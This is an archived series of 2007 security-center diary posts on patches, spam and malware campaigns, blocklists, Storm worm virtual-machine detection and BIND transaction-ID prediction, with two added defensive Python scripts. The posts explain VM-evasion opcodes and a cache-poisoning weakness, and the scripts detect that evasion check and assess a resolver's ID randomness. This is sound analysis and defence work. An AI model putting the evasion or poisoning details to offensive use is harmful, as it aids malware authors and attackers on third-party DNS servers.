Diaries

Published: 2007-07-31

FireFox Update 2.0.0.6 Is Now Available

Mozilla has issued an update to the FireFox browser.  This update resolves 2 security issues, one listed as critical and one listed as moderate.

This update resolves the "Unescaped URIs passed to external programs" vulnerability.

Mozilla Foundation Security Advisory 2007-27 - MFSA 2007-27 - Critical

www.mozilla.org/security/announce/2007/mfsa2007-27.html

This vulnerability affects the way information is passed to external programs for handling; an unescaped URI can cause the receiving program to misinterpret the information it gets.

Mozilla Foundation Security Advisory 2007-26  - MFSA 2007-26 - Moderate

www.mozilla.org/security/announce/2007/mfsa2007-26.html

This update resolves the "Privilege escalation through chrome-loaded about:blank windows" vulnerability.  From the Mozilla advisory: This could enable privilege escalation attacks against addons that create "about:blank" windows and populate them in certain ways (including implicit "about:blank" document creation through data: or javascript: URLs in a new window).


0 Comments

Published: 2007-07-31

More EMail Spam

We have received numerous emails today regarding yet another round of spam hitting the cyberwaves.  This spam is nothing more than a new twist on the pump and dump stock market emails.  It appears that these emails include a zip or RAR file for an attachment.  Once opened, these contain nothing more than the get rich quick stock market info.  There appears to be nothing malicious other than an attempt to sway the market.

0 Comments

Published: 2007-07-31

ISC Technical Difficulties

Several of our observant readers have contacted us today regarding the diary content being from May 31st.  No we are not trying to change back the hands of time (however, at my age I wouldn't mind it if we could).  We have been having technical problems with our Handlers/ISC server today and our webmaster has been diligently working on it in between teaching sessions at SansFire 2007 in Washington DC.  Dr J assures me that he has resolved the technical issues and we are back on line for the day.

0 Comments

Published: 2007-07-30

Malware Megabucks International

A reader alerted us to a bunch of malware that he had found after starting to unravel a pile of interlinked exploit pages. The exploit pages are spammed with "adult movie" kinda themes into search engines, etc, and thus most likely find enough "volunteers" who click on the links.

Domains involved are clipsforadults-dot-com and several of 9u???-free-movies-dot-cn, with the ??? standing for several letter combinations like eyd,gfo,fdo, etc. Someone's been busy registering throw-away domains.

The one bit that was of interest to us is that at the very end of this pile, the links try to download a "codec" from the site installobject-dot-com. The link used contains a 4-digit number, and each number, over a wide range, seems to return a slightly different binary.  The domain installobject-dot-com resolves to 85.255.113.235, a known bad address range for years - see isc.sans.org/diary.html?storyid=1873

AV detection is still thin; we are trying to help it along some. The files are of the W32/Zlob family: Kaspersky calls it Trojan-Downloader.Win32.Zlob.bxt, and Trend Micro has it as TROJ_ZLOB.DND.

Adult sites from China, nasty trojans from Ukraine - the Malware Megabucks International, Inc, at its best.

0 Comments

Published: 2007-07-30

ISC / DShield e-mail now with PGP signature

I started implementing PGP signed e-mails across the web site. The goal is to have most of our automatically generated e-mail PGP signed with a key reserved for these automated e-mails.

The key we will use:

pub   1024D/163EF538 2007-07-30 [expires: 2008-08-23]
Key fingerprint = 9958 2ABF 0AEE 06B2 2126 5C88 C9D8 1A62 163E F538
uid Internet Storm Center (Automatic Signing Only) <handlers@sans.org>
sub 2048g/FD87BD37 2007-07-30 [expires: 2008-08-23]
 

This key will be used ONLY for automated e-mails. Please do not use it to send us encrypted e-mail. This key, including a lot of other keys (and old keys) can be found here: https://isc.sans.org/PGPKEYS

Enjoy. And please use our contact form to report bugs. Individual handlers (if they choose to sign e-mail), will still use their individual keys.

0 Comments

Published: 2007-07-28

Blocklists - make the right choice

I have used real-time blocklists myself for a dozen or so years.  I've worked for companies and managed servers that have been listed on blocklists, unwarranted, more than once. I can't help but notice some huge changes between the granddaddy lists I did support and some of the current breed I'd stay away from.

As with all things the most negative experiences will stand out, but there's a lesson to be learned in how to detect the "bad" blocklists and how to avoid them.

The unintentional user

First, how do you know you are using a blocklist? You don't, unless you start to hunt for it. E.g. your Google toolbar has a blocklist of sites it thinks are a bad idea to surf to (*). It'll warn you about a supposedly bad website you really might want to avoid. But how many more blocklists are you using without having intentionally configured, chosen and vetted the processes behind them?

If you use e.g. a sendmail configuration file that you didn't write, how do you know it isn't using some blocklist to tune down the volume of spam?

If you're an unintentional user, you're not in control of the choices being made, and you and your peers might in the end suffer badly. So the advice is to seek out which blocklists you are using and go from being an unintentional to an intentional user.

False positives - false negatives

True positives and true negatives will mostly go unnoticed, but the other two can be problematic. A false positive is e.g. a blocklist for spammers that contains well-behaving Internet users. Those users (they might be your suppliers, your customers, ...) can't communicate with you anymore, and might give up on you as you just seem to be ignoring them rudely.

The false negatives are what will prompt some into searching for ever stricter rules as there is still spam sneaking through. We know that ever stricter measures will also increase the false positive rate dramatically.

For things like spam, where the spam dramatically outnumbers the genuine messages if your address is well known, getting spam-free with a blocklist is likely to cost you most if not all genuine messages as well. Basically, blocking all email will guarantee you no false negatives, but it'll also guarantee that all genuine messages turn out to be false positives.

Measuring false negatives is terribly easy for e.g. spam lists, while measuring false positives is next to impossible. Just measuring how much email got blocked says nothing at all, and if you need to read the messages in order to measure the effectiveness, you might just as well delete the spam by hand.

Criteria

Some criteria we could suggest to choose blocklists:

  • Speed of reaction: The faster (the more real-time) a list is updated, the easier it is to deal with false positives and with false negatives.
  • Selection criteria: How are the sources added to the blocklist, based on what criteria? How sure are the blocklist admins that the one they are listing is bad? How sure are you they will not add your partners, customers, suppliers and other business critical peers? Similarly, how sure are you they will not list you yourself (from experience: this is extremely painful)?
  • Goal of the blocklist: Does the list have an agenda (hidden or not) that you might not share with them? Do they aim to have 0 false negatives without care for false positives?
  • Ease of getting unlisted: How easy is it to contact the list administration for those listed? If it's e.g. a spam blocking list, chances are it can't be done by email as they will be using their own blocklist. Is there 24x7 support (remember the Internet is worldwide, so they need to cover all timezones) on getting back out for those unjustly listed?
  • Try contacting them to get unlisted: if you cannot reach them, remember what your communicating partner that got listed by accident will feel like. And while it might reflect mostly on the blocklist provider, it will also reflect on you and your organization due to your choice and implicit support of their (failing) processes.
  • Is there somebody who feels responsible enough behind it to put up out-of-band contact details such as phone numbers, working snail-mail addresses etc.? Of course this means they'll feel exposed to the scam artists they are blocking, but it also means those being blocked without reason have a way to complain.
  • Blocking for the right reasons. E.g. some anti-spam lists are blocking with the reason that the IP addresses sent unwanted TCP/IP traffic (not just unwanted email). Some might have political reasons or other things you don't want to be associated with.
  • Duration of a block: many IP addresses that get infected by bots etc. are home users on a (somewhat) dynamic IP address. Blocking such an IP address for a long time won't help, as the IP isn't fixed and the next user to get it will be blocked unwarranted. Similarly, infected machines do eventually get cleaned up by their rightful owners. So short durations are better.
  • Granularity of the block. Unless there are clear signs of malice, most regular users will clean up intrusions and malware instead of hopping about the IP address in an address space to avoid blocklists. Hence only very bad neighborhoods should get blocked indiscriminately. Similarly, "punishing" an ISP for having a single misbehaving customer will not work, as the ISP is hardly punished at all; it's the other (innocent) customers of the ISP that get hit.
    While there are people who will say they only deal with a specific country/continent and don't need anything outside, think a bit longer: will none of the employees of your partners, customers, ... ever go out of the country/continent on business or holiday and get a phone call to do something or try to make a decision on the road?
  • One practice I found to be impossible to deal with from a business point of view was a blocklist demanding money to get unlisted. Any self-respecting business will feel this is extortion and will not give in. No matter that they send it to their charity of choice, no matter how small the amount actually is, this remains a show stopper. For you this means you'll find contacts who get listed and have no way of getting out again.
  • Do the blocklist administrators actually warn those getting listed? Since many of the evil actions a machine performs are more often than not done without the knowledge of its rightful owner, a word to the ISP connecting the machine or the business hosting the machine can in fact be a big step towards detecting the rootkitted botnet member and starting the clean-up.

If your favorite blocklist fails many of these criteria, perhaps it's time to urgently switch blocklists, or move to another solution, so as to avoid the false positives you might not be aware of.

Sometimes just reading the FAQ will set off so many alarms that you might choose not to use their blocklist.

If you have more criteria to suggest, feel free, we'll update the story with the best suggestions. 

(*): I've never seen a false positive on the google toolbar myself, so I'm not criticizing them, just using it as one of the examples where you or your users might have picked up a blocklist without having the intention of doing so.

--
Swa Frantzen -- NET2S

0 Comments

Published: 2007-07-28

Con-fu revisited

Next week is a very famous pair of security conferences in the US.  I imagine quite a few of our readers will be attending.  So I offer my tips on secure networking from untrusted wireless networks.  You don't want to end up on the "Wall of Shame", right?  Assuming that you trust your wireless device drivers and SSH, here are my tips (from 2005):  http://isc.sans.org/diary.html?storyid=608

Please note that you can do this a little more easily without the Squid proxy on your remote SSHD (using the built-in SOCKS proxy of SSH instead).  However, if you use that approach your DNS requests still go through the local network.  If you use Squid, your DNS requests are also proxied, which is beneficial.

Also note that the wireless network does seem _way_ more reliable than it was two years ago, but it still goes down occasionally.

0 Comments

Published: 2007-07-27

Malware e-mail with Angelina Jolie temptation

Several reports today of a zip file with an executable inside.  The lure is some exciting fun with Angelina Jolie.  At this time, antivirus detection is low.

Update: Other folks are seeing the same emails, with different famous female names and subjects.  Nothing very shocking there.

0 Comments

Published: 2007-07-26

E-cards don’t like virtual environments

The biggest malware threat we’re dealing with at the moment is definitely the Storm worm. Unless your e-mail address is ultra secret, you probably received more than a couple of infamous e-card e-mails asking you to visit a strange URL address that can potentially lead to your machine being infected with the Storm worm.

While the Storm worm hasn’t brought anything really new, the authors definitely went a step further – the Storm worm’s code looks much better than a lot of malware we’ve seen. And besides that, you have a custom packer that makes analysis and detection more difficult, rootkit capabilities so it’s completely hidden, P2P botnet control and so on.

While analyzing one sample I noticed that the Storm worm tries to detect if it’s running in a virtual environment. This became pretty popular with malware writers lately. The main reason they're doing this is (presumably) to make analysis more difficult. The first step in malware analysis today is typically to run it in an isolated environment and to monitor its behavior.

By detecting virtual machines and changing the behavior, malware authors make analysis more difficult – an AV researcher either has to run the malware on physical machines, modify the virtual environment he’s using to prevent detection, or manually analyze the malware. That being said, virtual environment detection is also a double edged sword for malware authors – by implementing something like this they are effectively losing a certain number of potential victims, which will only be higher in the future, as virtual machines are more and more popular (especially for servers).

The Storm worm tries to detect two popular virtual machine products: VMware and Microsoft’s VirtualPC. If it detects that it’s running in one of these products it will simply reboot the machine – the machine will not be infected. So, let’s see how the Storm worm does this.

VMWare detection

[Figure: Detection of VMware]

The method shown above was published by Ken Kato (http://chitchat.at.infoseek.co.jp/vmware/backdoor.html) and it uses VMware’s “backdoor” I/O port. Basically, VMware supports a magic number (0x564D5868 = “VMXh”) that has to be used with VMware’s I/O port (0x5658 = “VX”). After the IN instruction, if the program is running in VMware the EBX register will contain the magic number. This method makes it trivial to detect VMware (there are many, many other ways of doing this). Of course, if you are manually debugging this you can just change the result of the CMP instruction (zero the Z flag) and the Storm worm will not detect that you’re running in VMware.
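The two constants above are what an analyst can key a signature on. The following is an added example (not Storm worm code and not an ISC tool) that scans a raw binary for the x86 encodings of the magic number being loaded into EAX and, nearby, an IN instruction and the port constant; the byte encodings are standard x86, the 64-byte window and the sample buffer are constructed assumptions.

```python
"""Signature scanner for the VMware "backdoor" I/O port check described in the diary.

Assumption: the code is plain, unobfuscated x86 (a packed sample must be unpacked
first), and the magic number is loaded with mov eax,imm32 or push imm32.
"""
import struct

VMWARE_MAGIC = 0x564D5868   # "VMXh", must be in EAX when the IN executes
VMWARE_PORT = 0x5658        # "VX", the I/O port number placed in (E)DX
WINDOW = 64                 # bytes after the magic load in which to expect the IN

MAGIC_LE = struct.pack("<I", VMWARE_MAGIC)                   # 68 58 4D 56
LOADERS = {0xB8: "mov eax, imm32", 0x68: "push imm32"}       # opcode preceding the dword
PORT_MOV_EDX = b"\xBA" + struct.pack("<I", VMWARE_PORT)      # mov edx, 0x5658
PORT_MOV_DX = b"\x66\xBA" + struct.pack("<H", VMWARE_PORT)   # mov dx, 0x5658
IN_OPCODES = (b"\xED", b"\xEC")                               # in eax, dx / in al, dx


def find_vmware_backdoor_checks(data: bytes) -> list:
    """Return one record per candidate backdoor check in `data`.

    A candidate needs the magic dword immediately after a loader opcode and an IN
    opcode within WINDOW bytes after it. Seeing the port constant in the same
    window raises the confidence; a lone 0xED byte is common in unrelated code.
    """
    hits = []
    pos = data.find(MAGIC_LE)
    while pos != -1:
        loader = data[pos - 1] if pos > 0 else None
        if loader in LOADERS:
            window = data[pos + 4: pos + 4 + WINDOW]
            has_in = any(op in window for op in IN_OPCODES)
            has_port = PORT_MOV_EDX in window or PORT_MOV_DX in window
            if has_in:
                hits.append({
                    "offset": pos - 1,
                    "loader": LOADERS[loader],
                    "port_constant_seen": has_port,
                    "confidence": "high" if has_port else "medium",
                })
        pos = data.find(MAGIC_LE, pos + 1)
    return hits


# Constructed sample: a harmless stub mimicking the instruction sequence the diary
# describes, padded with NOPs. It is not taken from any real sample.
SAMPLE = (
    b"\x90" * 16                        # filler
    + b"\xB8\x68\x58\x4D\x56"           # mov eax, 0x564D5868
    + b"\xBB\x00\x00\x00\x00"           # mov ebx, 0
    + b"\x66\xBA\x58\x56"               # mov dx, 0x5658
    + b"\xED"                           # in eax, dx
    + b"\x81\xFB\x68\x58\x4D\x56"       # cmp ebx, 0x564D5868  (the check the text mentions)
    + b"\x90" * 16                      # filler
)

if __name__ == "__main__":
    for hit in find_vmware_backdoor_checks(SAMPLE):
        print(hit)
```

The cmp immediate at the end of the sample also contains the magic dword but is not preceded by a loader opcode, so it does not produce a second hit.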

VirtualPC detection

[Figure: Detection of VirtualPC]

The Storm Worm uses Elias Bachaalany’s method (http://www.codeproject.com/system/VmDetect.asp - this web site seems to be down at the moment) for VirtualPC detection. Basically this method consists of using illegal instruction opcodes. The program sets an exception handler that is called on normal CPUs when an illegal instruction is encountered. However, if you are running in VirtualPC this will not happen and the program can easily detect if this is the case (the EBX register will stay 0 if VirtualPC is running).

It will be interesting to see if malware authors will change these tactics in the future as the number of virtual machines will grow for sure. As I already wrote – virtual environment detection is a double edged sword – it makes malware analysis more difficult (it is not always easy to circumvent detection as in this case) but it also decreases the number of potential victims. It is also clear that malware authors keep improving their code and that they are keeping an eye on research fields that interest them, such as virtual machine detection.

--
Bojan

0 Comments

Published: 2007-07-25

APEWS.ORG: Please contact us

Please pardon the interruption.  If you manage the APEWS list, please contact us.

Just a few more details: APEWS appears to use our "top sources" list http://isc.incidents.org/ipsascii.html as a blocklist. This list is an unfiltered list of sources for which we received a lot of reports. It is not supposed to be used as a blocklist, as it is bound to include false positives. In addition, APEWS turns these /32 listings into /17 blocks, and they appear to violate our "Creative Commons Share-Alike License". Sadly, all other attempts to contact them have failed.

APEWS may be a useful "anti-spam" list if you do not mind losing a lot of valid e-mail as well. For example, right now, it appears to block the entire AT&T network.

0 Comments

Published: 2007-07-25

BIND Updates Available

The Internet Systems Consortium has announced updates to BIND that address CVE-2007-2926.

From their announcements:

BIND 9.4.1-P1 can be downloaded from

ftp://ftp.isc.org/isc/bind9/9.4.1-P1/bind-9.4.1-P1.tar.gz

The PGP signature of the distribution is at

ftp://ftp.isc.org/isc/bind9/9.4.1-P1/bind-9.4.1-P1.tar.gz.asc
ftp://ftp.isc.org/isc/bind9/9.4.1-P1/bind-9.4.1-P1.tar.gz.sha256.asc
ftp://ftp.isc.org/isc/bind9/9.4.1-P1/bind-9.4.1-P1.tar.gz.sha512.asc
 

BIND 9.3.4-P1 can be downloaded from

ftp://ftp.isc.org/isc/bind9/9.3.4-P1/bind-9.3.4-P1.tar.gz

The PGP signature of the distribution is at

ftp://ftp.isc.org/isc/bind9/9.3.4-P1/bind-9.3.4-P1.tar.gz.asc
ftp://ftp.isc.org/isc/bind9/9.3.4-P1/bind-9.3.4-P1.tar.gz.sha256.asc
ftp://ftp.isc.org/isc/bind9/9.3.4-P1/bind-9.3.4-P1.tar.gz.sha512.asc
 
 
BIND 9.2.8-P1 can be downloaded from

ftp://ftp.isc.org/isc/bind9/9.2.8-P1/bind-9.2.8-P1.tar.gz

The PGP signature of the distribution is at

ftp://ftp.isc.org/isc/bind9/9.2.8-P1/bind-9.2.8-P1.tar.gz.asc
ftp://ftp.isc.org/isc/bind9/9.2.8-P1/bind-9.2.8-P1.tar.gz.sha256.asc
ftp://ftp.isc.org/isc/bind9/9.2.8-P1/bind-9.2.8-P1.tar.gz.sha512.asc
 
 
BIND 9.5.0a6 can be downloaded from

ftp://ftp.isc.org/isc/bind9/9.5.0a6/bind-9.5.0a6.tar.gz

The PGP signature of the distribution is at

ftp://ftp.isc.org/isc/bind9/9.5.0a6/bind-9.5.0a6.tar.gz.asc
ftp://ftp.isc.org/isc/bind9/9.5.0a6/bind-9.5.0a6.tar.gz.sha256.asc
ftp://ftp.isc.org/isc/bind9/9.5.0a6/bind-9.5.0a6.tar.gz.sha512.asc
 
These signatures were generated with the ISC public key, which is
available at <http://www.isc.org/about/openpgp/pgpkey2006.txt>

0 Comments

Published: 2007-07-24

A Word to the Wise - SPIM Flood

We have received several reports today from people that are getting flooded with SPIM on their IM accounts.  These messages provide a link to various web sites.  These sites all seem to point to one site, www dot messenger-tips dot com.  This site purports to check your IM friends/contacts and report back to you which of them have blocked you.  All you have to do is give them your login and password information.  You also have to agree to their terms and conditions.  OK, so we read their Terms and Conditions page, and what do we find?  First:

They will NOT be responsible for any misuse of the information you provide.  They also have no liability for content, views, advice or guidance because they provide a service that is for entertainment purposes only. (Huh? What entertainment?) You provide them with the ID and password; of course they won't share the information with anyone without your consent. (And if you believe that, I have a bridge I will sell you.)  Now here is the real catch-22: by agreeing to the terms and conditions you agree to allow them to SPIM all of your friends and contacts.  Wonderful.

I am not sure if this program installs any malware or opens any hole in your computer for them to crawl through.  I don't have a sacrificial lamb here that I can test it with.  We have not been able to determine if it is anything more than ad-ware.  Bottom line, folks: DO NOT CLICK ON LINKS.
0 Comments

Published: 2007-07-24

Port 57886 Activity

In reviewing the Top 10 Ports today at isc.sans.org/portreport.html I noticed that there is an unusual increase in activity on port 57886 (see isc.sans.org/port.html).

The data that is being submitted indicates that we have gone from less than 100 targets a day to over 50,000.  We would like to know what you are seeing.  Take a look at your network to determine if you are seeing this activity and let us know. It would be helpful if we could get some data captures so that we can take a look at the data and see what is generating the traffic to port 57886.  You can upload the captures to our website at isc.sans.org/contact.html

0 Comments

Published: 2007-07-24

BIND cache poisoning vulnerability details released

Amit Klein wrote about a paper he just released with details about a BIND 9 cache poisoning issue. This is one of the problems addressed by the latest version of BIND 9.

The very brief summary: BIND prior to version 9.4.1-P1 did not use a strong algorithm to create DNS transaction IDs. As a result, one can derive the next transaction ID BIND will use by knowing the last few transaction IDs. In this case, up to 15 queries are used.

Once the attacker knows the "state" of the target's BIND install, it is possible to forge a response. DNS uses UDP by default. Each query sent by the DNS server includes a random transaction ID. The server responding to the query includes this transaction ID so the querying DNS server knows which query is answered by this particular response. BIND always uses the same source port for its queries.

The attack appears to be quite feasible. Probably the main difficulty will be getting the spoofed packet routed. But unless the attacker's network implements strict egress filtering, this is very much a feasible attack. Best to patch your BIND server soon.
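The two weaknesses named above, a fixed source port and predictable transaction IDs, are things you can measure on your own resolver. The following added example (not part of BIND or of Amit Klein's paper) takes (source port, transaction ID) pairs observed on a resolver's outbound queries, e.g. extracted from a packet capture, and reports whether the port is fixed and whether the IDs look weak; the entropy floor, the sample minimum and the two sample data sets are constructed assumptions for illustration.

```python
"""Self-assessment of a resolver's outbound DNS queries for the properties the diary
calls out: a fixed source port and predictable 16-bit transaction IDs (TXIDs).
"""
import math
import random
from collections import Counter

TXID_BITS = 16
MIN_SAMPLES = 32       # assumption: below this the entropy estimate is too noisy
ENTROPY_FLOOR = 0.9    # assumption: mean per-bit entropy below this is reported as weak


def per_bit_entropy(txids):
    """Mean Shannon entropy (0..1) over the 16 bit positions of the observed TXIDs."""
    n = len(txids)
    total = 0.0
    for bit in range(TXID_BITS):
        p = sum((t >> bit) & 1 for t in txids) / n
        if 0 < p < 1:
            total -= p * math.log2(p) + (1 - p) * math.log2(1 - p)
    return total / TXID_BITS


def constant_step(txids):
    """True when every TXID equals the previous one plus the same constant mod 2^16.

    This is the simplest form of 'the next ID follows from the last few'; it does
    not attempt to model the actual BIND generator, only to flag the obvious case.
    """
    if len(txids) < 3:
        return False
    steps = {(b - a) % (1 << TXID_BITS) for a, b in zip(txids, txids[1:])}
    return len(steps) == 1


def assess_query_observations(observations):
    """observations: list of (source_port, txid) from a resolver's outbound queries."""
    ports = [p for p, _ in observations]
    txids = [t for _, t in observations]
    findings = []
    too_few = len(observations) < MIN_SAMPLES
    distinct_ports = len(set(ports))
    if distinct_ports == 1:
        findings.append("fixed source port: the TXID is the only unpredictable field")
    entropy = per_bit_entropy(txids) if txids else 0.0
    if not too_few and entropy < ENTROPY_FLOOR:
        findings.append(f"low TXID entropy ({entropy:.2f} per bit)")
    if constant_step(txids):
        findings.append("TXIDs advance by a constant step: trivially predictable")
    repeats = sum(c - 1 for c in Counter(txids).values())
    if too_few:
        verdict = "inconclusive"
    else:
        verdict = "weak" if findings else "ok"
    return {
        "samples": len(observations),
        "distinct_ports": distinct_ports,
        "txid_entropy": round(entropy, 3),
        "txid_repeats": repeats,
        "findings": findings,
        "verdict": verdict,
    }


# Constructed samples, not real captures.
# A resolver that always queries from port 53 and hands out TXIDs in steps of 7.
WEAK_RESOLVER = [(53, (1000 + 7 * i) & 0xFFFF) for i in range(200)]
# A resolver with random source ports and random TXIDs (seeded for repeatability).
_rng = random.Random(1234)
GOOD_RESOLVER = [(_rng.randint(1024, 65535), _rng.getrandbits(16)) for _ in range(200)]

if __name__ == "__main__":
    print(assess_query_observations(WEAK_RESOLVER))
    print(assess_query_observations(GOOD_RESOLVER))
```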

CVE: CVE-2007-2926

Versions affected:
  • BIND 9.0 (all versions)
  • BIND 9.1 (all versions)
  • BIND 9.2.0, 9.2.1, 9.2.2, 9.2.3, 9.2.4, 9.2.5, 9.2.6, 9.2.7, 9.2.8
  • BIND 9.3.0, 9.3.1, 9.3.2, 9.3.3, 9.3.4
  • BIND 9.4.0, 9.4.1
  • BIND 9.5.0a1, 9.5.0a2, 9.5.0a3, 9.5.0a4, 9.5.0a5

Not vulnerable: BIND 9.2.8-P1, BIND 9.3.4-P1, BIND 9.4.1-P1 or BIND 9.5.0a6

For details, see www.trusteer.com/docs/bind9dns.html

ISC.org link: www.isc.org/index.pl?/sw/bind/bind-security.php

0 Comments

Published: 2007-07-23

Mailbag

Numerous readers have contacted us in the past hour to let us know that ...

Thanks to all who reported these.

0 Comments

Published: 2007-07-23

Antivirus: The emperor is naked

Over the weekend, I read a report by an anti-virus firm about the "discovery" of a malware serving host which creates a new, unique malware binary "on the fly" for every exploited PC connecting to retrieve it. As if this were anything new, really.  But rather than to draw the obvious conclusion from this discovery - namely that the antivirus approach of the last 20 years, which is based on the assumption that you can keep up with creating "patterns" for all bad things out there, has completely outlived its usefulness - the article went on to extol the virtues of new "behavioural" virus defense software.

Time is overdue to radically change tactics on the malware defense side - but why doesn't anyone do it? Is it because the anti-virus vendors, reveling in their plum revenue stream of "update licenses", do not really see any need to change? Is it because the operating system vendors have their eyes set on this same (for them: additional) revenue stream, and don't want to dry it up by making a few changes to the OS itself?

At least for the corporate environment, the "solution" would be kinda obvious. Large firms have standardized their workplace computers, and use automated software distribution tools to patch, update and deploy software on client PCs. Frequently, the distribution mechanism used is even from the same vendor as the operating system on the workstations. All that's needed to make life a misery for malware in such an environment is a component which enforces that workstations only load/run executable code deployed to the workstation via the corporate software distribution system. Wouldn't this be a useful application of all the DRM code for a change?

Yes, I'm aware that this still leaves a number of attack points and injection techniques uncovered. And yes, this would not completely remove the need for anti virus software. But it sure would be a huge step in the right direction.

I think it's time to stop pretending that the emperor is wearing clothes.

0 Comments

Published: 2007-07-22

Recent change in Stock-Spam Tactics (PDF and excel)

It started nearly a month ago, a shift from image-based spam to spams containing PDF files.

I'm sure that you've seen these in your mailbox, the shift over to PDF was effective in evading spam-filters.  You have also likely noted their shift in tactics from a simple text message in the PDF over to encoded images in the PDF (to foil pdf2text-like tools, I presume.)

I would have thought that this shift would have had an impact on the efficacy of the scheme.  "Certainly people won't open unsolicited PDF files," I thought.  Based on the number of submissions in the past month asking if these were PDF-exploit attempts, I felt that this shift would have had some impact on the success of this type of scheme.

In January, I performed an unscientific experiment monitoring the impact of Pump and Dump schemes on the targeted companies.  My hypothesis was that Pump and Dump schemes have an overall negative impact on the company whose symbol was targeted.  I was unable to prove this hypothesis; the stock price quickly returns to normal three to four weeks after an event (in the population of stocks that I tracked in the first quarter of 2007, that is.)

This morning I did a bit of comparison with symbols identified in the few PDF files that I had left in my mailbox.  Looking at this small sample, it seems that these schemes are just as effective in manipulating the stock price as text-only and image-based spam messages.

The consequence of this is that there exists a large population of people with a fair amount of assets in the stock market who willingly open unsolicited PDF files.  This makes for a concerning scenario when an arbitrary-code-execution vulnerability is identified in popular PDF readers.

A reader submitted a report that they were receiving a large number of spam messages consisting of an Excel file.  Examination of this file showed that it contained a Pump and Dump message.  This could serve as an indicator of another shift in tactics.  The VERY interesting part is that the formatting of this Excel file is extremely similar to the first PDF version reported by Maarten.  This group appears to target the German stock market.  I expect US penny-stock schemes to employ this technique shortly.  I'm similarly concerned about the number of people who will open unsolicited Excel files too.

0 Comments

Published: 2007-07-20

Web is the way to go?

We have all seen the recent web related incidents such as Mpack that leverage compromised web sites. These tactics are gaining popularity in malware distribution. Web technologies have been advancing at sonic speed every day; new technologies such as Web 2.0 mashups are getting attention from everybody. If not carefully deployed, these technologies will bite us back.

Some of the traditional (old school) security folks still think: if I patch all the vulnerabilities according to the advisories released by the vendor, I will be safe. As we get more and more 0-day vulns in OSes and related software packages, this practice is not acceptable anymore. On the web application front, it is totally unsafe. If you developed your own web application, no vendor will knock on your door to get the application fixed.

Some people may like to think the custom code they wrote would be hard to mass-exploit (using a worm) and is therefore unlikely to be attacked. The truth is, scanning for vulnerabilities (at least the common ones) is not difficult at all. Take XSS Assistant as an example: it leverages Greasemonkey, an add-on to Firefox, and as you are surfing you can click a few times and it will tell you whether a site is vulnerable to Cross Site Scripting. Locating the vulnerability may be the easy part, but exploiting it isn't hard either; there are exploitation frameworks like BeEF that can assist in creating damaging exploits. And that's just for XSS; the other web related vulnerabilities are all getting their share of tools to ease the attack process.

A few persistent people might still think a compromised web site is no big deal, just a defaced web site.... Wrong! There is a whole lot more than that when a web site gets compromised: deploying a malware distribution point like Mpack is one possibility, but it could easily cause a serious threat to the overall network security as well. SQL injection, in its more serious form, can easily get binaries and executables onto the database server and start running malicious code; how does running nmap from your database server sound to you? If that is all too theoretical to you, take a look at these reverse shells designed to run on a web server, yielding a command shell back to the attacker. Once the attacker can upload the code or remotely include it into the running web application, they can get a command shell on your web server.

The reverse shell technique is a lot like the traditional infrastructure type of attack where an initial exploit is used to get a shell back to the attacker. The major change here is that web applications are used as the medium instead of the OS or other software packages. If your application security practice is not as good as that of some of the large software manufacturers, it might be a cause for concern.

Does your current incident handling plan include scenarios of compromised web applications? If not, I suggest you look at it seriously.

If you want to learn more about web attack techniques, SANS offers the Web Application Security Workshop, Breaking Web Applications, and AJAX and Web Services Security Overview.

0 Comments

Published: 2007-07-19

Old Vulnerabilities Can Still Haunt You

Andrew writes in to say ..

"It just goes to show that old vulnerabilities can still be effective. I recently ran across a site that our IDS detected via the ANI exploit.

http://ww.xx.yyy.zz    /oth/ms07-017.ani

http://ww.xx.yyy.zz    /oth/ms07-017.php

One of our machines accessed this site and got exploited, but they had the MS07-017 patch. Very strange. After de-obfuscating the javascript to see what exploits it uses, it turns out the site goes after MS03-011, MS06-014 and MS07-017. The system was patched for the two newer exploits, but not for the old Microsoft JVM vulnerability.

To make things worse, the site drops ntos.exe, which contains rootkit functionality. At least the binary is fairly well detected by AV vendors.

Depending on how security savvy your organization is, legacy issues can slip by for years.
"

If you think you're patched to current, how do you know for sure?

An occasional scan (using MBSA for example) will show you any missing patches.  In a perfect world, every system would be able to always be patched to current but if you are one of the people who can't deploy certain patches because it will break critical business functionality, these reports will be the start of the paper trail you will want for your audits showing why they can't be patched.

0 Comments

Published: 2007-07-19

Microsoft Security Contact Pages

In an earlier diary, we included a link to Microsoft's security web site that did not work.  Based on input from our readers we updated the link to one that seemed to work.  Microsoft told us today that there are two more URLs they would prefer that you use:

For home users:  http://support.microsoft.com/securityhome

For IT professionals:  http://support.microsoft.com/gp/securityitpro

In both cases, on the right-hand side there is a phone icon. Under it is the "select your region" link (if the region is wrong). Each region links to the proper phone numbers for that region.

Marcus H. Sachs
Director, SANS Internet Storm Center

0 Comments

Published: 2007-07-18

Security Update for Firefox: 2.0.0.5

The latest revision to Firefox 2 has been released (2.0.0.5). It fixes a handful of assorted annoyances but also includes a security update or two (one is a remote code execution). Firefox users should upgrade when convenient. As a reminder, Firefox 1.5 is no longer supported (since May). If you haven't upgraded to Firefox 2, you should think about it.

--

John Bambenek / bambenek [at] gmail {dot} com
University of Illinois at Urbana-Champaign

0 Comments

Published: 2007-07-18

Tragedy phishing scam

As many of you may be aware, yesterday a huge tragedy happened in Brazil: an airplane crash that probably killed more than 200 people. (Full story here)

As always, the miscreants will start to make their rounds, so over the next hours we expect phishing scams with links to 'videos and photos' of the accident, which will lead to malicious software or web pages. Our advice is to pay attention and avoid this kind of email.

--------------------------------------------------------------------------

Handler: Pedro Bueno ( pbueno //&&// isc. sans. org )

0 Comments

Published: 2007-07-18

Oracle Quarterly Critical Patch Update

Oracle released its quarterly Critical Patch Update today. This quarterly update contains 45 new security fixes that range across many of their products. The ISC strongly recommends that these updates be applied in a timely manner, given the risk posed by attackers compromising sensitive data held in your database products.


For more information on the products and versions affected, please see the Oracle Critical Patch Update website.

0 Comments

Published: 2007-07-18

New Version of FireFox

Earlier today, Mozilla Firefox 2.0.0.5 was released. It has a number of bug fixes, including a couple of privacy-related bugs and a few security-related ones.

Mozilla's forum shows many of the details of these fixes for those who would like to peruse them until the release notes are updated. You can download the newest version from mozilla.com or through the browser's automated update facility.

0 Comments

Published: 2007-07-17

Couple ISC site updates

The page which allows you to sign up for new diary notifications was broken and is now fixed again (see http://isc.sans.org/notify.html ).

A couple weeks ago I added AS reports. They are still being tested. Let me know if you have feedback. (see http://isc.sans.org/as.html )

We are planning, in the not too distant future, to do a test of our "infocon" system. This is just a pre-pre-notification, and here is the overall plan I am thinking about right now:

  1. publish a story with details about the test, a few days in advance.
  2. publish a second diary story with details about the test, one hour before the test.
